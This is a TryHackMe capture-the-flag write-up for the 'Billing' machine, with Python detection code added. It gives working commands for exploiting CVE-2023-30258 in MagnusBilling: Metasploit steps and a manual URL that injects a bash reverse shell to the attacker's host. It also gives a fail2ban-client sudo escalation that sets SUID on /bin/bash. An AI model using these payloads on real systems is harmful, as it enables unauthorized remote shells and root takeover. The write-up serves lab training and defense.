Hacking the matrix, one phish at a time

Billing – THM Writeup


Reconnaissance

Port Scan

We start with rustscan to scan the machine's open ports, identify the service versions behind them and run the default nmap scripts against them:

rustscan -a 10.112.148.182 -- -sCV -oN target
  • -a: specifies the target IP address to scan
  • --: separates rustscan arguments from nmap arguments
  • -sC: runs default nmap scripts for additional enumeration
  • -sV: detects service versions running on open ports
  • -oN: saves scan output in normal format to specified file

This gives us the following information about the open ports:

  • 22 – SSH – OpenSSH 9.2p1 Debian
  • 80 – HTTP – Apache httpd 2.4.62
    • http-robots.txt: 1 disallowed entry
      • /mbilling/
  • 3306 – MySQL – MariaDB 10.3.23 or earlier (unauthorized)
  • 5038 – asterisk – Asterisk Call Manager 2.10.6

Initial Access

Visiting /mbilling/ on the web server, we find a login page titled Magnus Billing, which appears to be real, off-the-shelf software.

Searching online for Magnus Billing vulnerabilities leads us to this Metasploit exploit:

https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/magnusbilling_unauth_rce_cve_2023_30258.rb

To use it, we follow these steps:

  1. msfconsole to start the Metasploit console
  2. use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
  3. set SRVHOST LOCAL-IP
  4. set RHOSTS MACHINE-IP
  5. set LHOST LOCAL-IP
  6. run

The difference between a script kiddie and a real pentester is understanding why this exploit works. If you don't want to know why it works, skip to the Privilege Escalation section.

Explanation of the exploit

This exploit abuses CVE-2023-30258, a command injection vulnerability in MagnusBilling 6.x and 7.x.

The vulnerability exists because the file lib/icepay/icepay.php receives the democ parameter from the URL (via a GET request).

The code takes the democ parameter and passes it straight into the exec() function without any sanitization.

The exploit abuses this by sending a democ parameter crafted in this form:

/dev/null;{COMMAND-TO-EXECUTE};#

This way it executes whatever command you want, and the trailing ;# ensures that nothing else on the original command line gets executed.

So we don't need Metasploit; we can exploit this manually by:

  1. Start a listener with penelope or netcat (nc -nlvp 4444)
  2. Start CAIDO or BurpSuite
  3. Intercept any request
  4. Make a request to this endpoint, URL-encoding the democ payload:
http://MACHINE-IP/mbilling/lib/icepay/icepay.php?democ=dev/null;bash -c '/bin/bash -i >& /dev/tcp/LOCAL-IP/4444 0>&1';#
  • democ=dev/null: redirects standard output to /dev/null to discard any output
  • bash -c: executes the following command string in a new bash shell
  • /bin/bash -i: starts an interactive bash shell
  • >&: redirects both stdout and stderr to the specified destination
  • /dev/tcp/LOCAL-IP/4444: creates a TCP connection to the attacker’s IP on port 4444
  • 0>&1: redirects stdin to the same destination as stdout, completing the reverse shell
  • ;#: comments out any remaining code to prevent execution errors
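As an added defender-side example (not code from the writeup or from MagnusBilling), the following Python flags Apache access-log requests to icepay.php whose URL-decoded democ value contains shell metacharacters, and shows the kind of allowlist check that would have kept the payload above out of exec(). The log lines and the allowlist pattern are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

ICEPAY_PATH = "/mbilling/lib/icepay/icepay.php"
# Characters that let a value inside exec() end the intended command and chain another.
SHELL_META = re.compile(r"[;&|`$<>\n]")
# Allowlist for a legitimate democ value (an assumption for illustration, not the vendor's fix).
DEMOC_OK = re.compile(r"[A-Za-z0-9_.-]{1,64}")

def validate_democ(value: str) -> bool:
    """Hardened check: accept only a plain token, so shell metacharacters never reach exec()."""
    return DEMOC_OK.fullmatch(value) is not None

def flag_request(log_line: str):
    """Return (client_ip, decoded democ) for an Apache combined-log line whose democ
    value could break out of the shell command in icepay.php, otherwise None."""
    m = re.match(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"', log_line)
    if not m:
        return None
    ip, target = m.group(1), m.group(2)
    parts = urlsplit(target)
    if parts.path != ICEPAY_PATH:
        return None
    for democ in parse_qs(parts.query).get("democ", []):  # parse_qs URL-decodes the value
        if not validate_democ(democ) and SHELL_META.search(democ):
            return ip, democ
    return None

def scan(lines):
    """Run flag_request over a log and keep the hits."""
    return [hit for hit in map(flag_request, lines) if hit]

# Constructed sample log (not from the machine): a benign call, one request in the
# /dev/null;...;# shape described above with a harmless command, and an unrelated path.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=demo1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2025:10:00:05 +0000] "GET /mbilling/lib/icepay/icepay.php?democ=%2Fdev%2Fnull%3Bid%3B%23 HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Jan/2025:10:00:07 +0000] "GET /mbilling/index.php?democ=%3Bid HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, democ in scan(SAMPLE_LOG):
        print(f"command injection attempt from {ip}: democ={democ!r}")
```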

And there we go: we have a reverse shell and can read user.txt.

Privilege Escalation

Now, if we started the reverse shell with Penelope, we can run linpeas.sh by following these steps:

  1. Press F12
  2. run peass_ng
  3. sessions 1 → to return to our reverse shell

With sudo -l we see that we can execute the fail2ban-client binary, so we search for it on Google and find:

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/fail2ban-command

  1. Get jail list: sudo /usr/bin/fail2ban-client status
  2. Choose one of the jails: sudo /usr/bin/fail2ban-client get <JAIL> actions
  3. Create a new action with name pwn: sudo /usr/bin/fail2ban-client set <JAIL> addaction pwn
  4. Set the actionban payload to give SUID privileges to /bin/bash: sudo /usr/bin/fail2ban-client set <JAIL> action pwn actionban "chmod +s /bin/bash"
  5. Trigger the action: sudo /usr/bin/fail2ban-client set <JAIL> banip 1.2.3.5
  6. Get root shell: /bin/bash -p
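As an added example, not part of the writeup, here is the check a defender would run on the other side of this step: a Python audit that flags sudoers entries granting fail2ban-client as root (fail2ban runs every action command as root, so such a grant is effectively root), plus a filter over sudo entries in auth.log for fail2ban-client calls that define or rewrite an action. The user name, jail name, sudoers lines and log lines are constructed.

```python
import re

# fail2ban runs each jail's actionban/actionunban command as root, so a user allowed
# to run fail2ban-client via sudo can make it execute any command as root.
ACTION_VERBS = {"addaction", "actionban", "actionunban", "actionstart", "actionstop"}
SUDO_LOG = re.compile(r"sudo:\s+(?P<user>\S+)\s*:.*?USER=(?P<runas>\S+)\s*;\s*COMMAND=(?P<cmd>.*)$")
SUDOERS = re.compile(r"^(?P<who>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?:NOPASSWD:\s*)?(?P<cmds>.+)$")

def audit_sudoers(lines):
    """Return (user, command spec) for entries that let a user run fail2ban-client as root."""
    findings = []
    for line in lines:
        m = SUDOERS.match(line.split("#", 1)[0].strip())
        if not m:
            continue
        runas = m.group("runas").split(":")[0]  # "(ALL:ALL)" -> "ALL"
        if runas in ("ALL", "root") and "fail2ban-client" in m.group("cmds"):
            findings.append((m.group("who"), m.group("cmds").strip()))
    return findings

def detect_action_abuse(auth_log_lines):
    """Return (user, command) for sudo fail2ban-client calls that define or rewrite an
    action; banning an IP is routine, editing actions from the CLI is not."""
    hits = []
    for line in auth_log_lines:
        m = SUDO_LOG.search(line)
        if not m or m.group("runas") != "root" or "fail2ban-client" not in m.group("cmd"):
            continue
        if set(m.group("cmd").split()) & ACTION_VERBS:
            hits.append((m.group("user"), m.group("cmd")))
    return hits

# Constructed samples (user, jail name and log lines are not from the machine).
SAMPLE_SUDOERS = [
    "root    ALL=(ALL:ALL) ALL",
    "opsuser ALL=(ALL) NOPASSWD: /usr/bin/fail2ban-client   # this is the risky grant",
    "backup  ALL=(ALL) NOPASSWD: /usr/bin/rsync",
]
SAMPLE_AUTH_LOG = [
    "Jan  1 10:00:01 host sudo:   opsuser : TTY=pts/0 ; PWD=/home/opsuser ; USER=root ; COMMAND=/usr/bin/fail2ban-client status",
    "Jan  1 10:00:09 host sudo:   opsuser : TTY=pts/0 ; PWD=/home/opsuser ; USER=root ; COMMAND=/usr/bin/fail2ban-client set example-jail action pwn actionban chmod +s /bin/bash",
    "Jan  1 10:00:15 host sudo:   opsuser : TTY=pts/0 ; PWD=/home/opsuser ; USER=root ; COMMAND=/usr/bin/fail2ban-client set example-jail banip 1.2.3.5",
]

if __name__ == "__main__":
    for who, spec in audit_sudoers(SAMPLE_SUDOERS):
        print(f"sudoers: {who} may run {spec} as root")
    for who, cmd in detect_action_abuse(SAMPLE_AUTH_LOG):
        print(f"auth.log: {who} modified a fail2ban action: {cmd}")
```

The sudoers finding is the thing to fix (drop the grant or restrict it to read-only subcommands), while the auth.log hit is what to alert on if the grant has to stay.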

And there we go, we have completed the Billing machine.

Conclusion

This writeup demonstrated a complete penetration test of the Billing TryHackMe machine, showcasing both automated and manual exploitation techniques. We exploited CVE-2023-30258, a command injection vulnerability in MagnusBilling’s icepay.php file, to gain initial access as the www-data user. Understanding the vulnerability mechanism allowed us to bypass the need for Metasploit and craft a manual exploit. For privilege escalation, we leveraged sudo permissions on fail2ban-client to create a malicious action that set the SUID bit on /bin/bash, ultimately achieving root access. This machine effectively illustrated the importance of understanding exploit mechanics rather than relying solely on automated tools, as well as the critical security risks posed by unsanitized user input and overly permissive sudo configurations.

Video Walkthrough

Here you can find a video walkthrough of this machine.

https://youtu.be/Myu6yf5pOck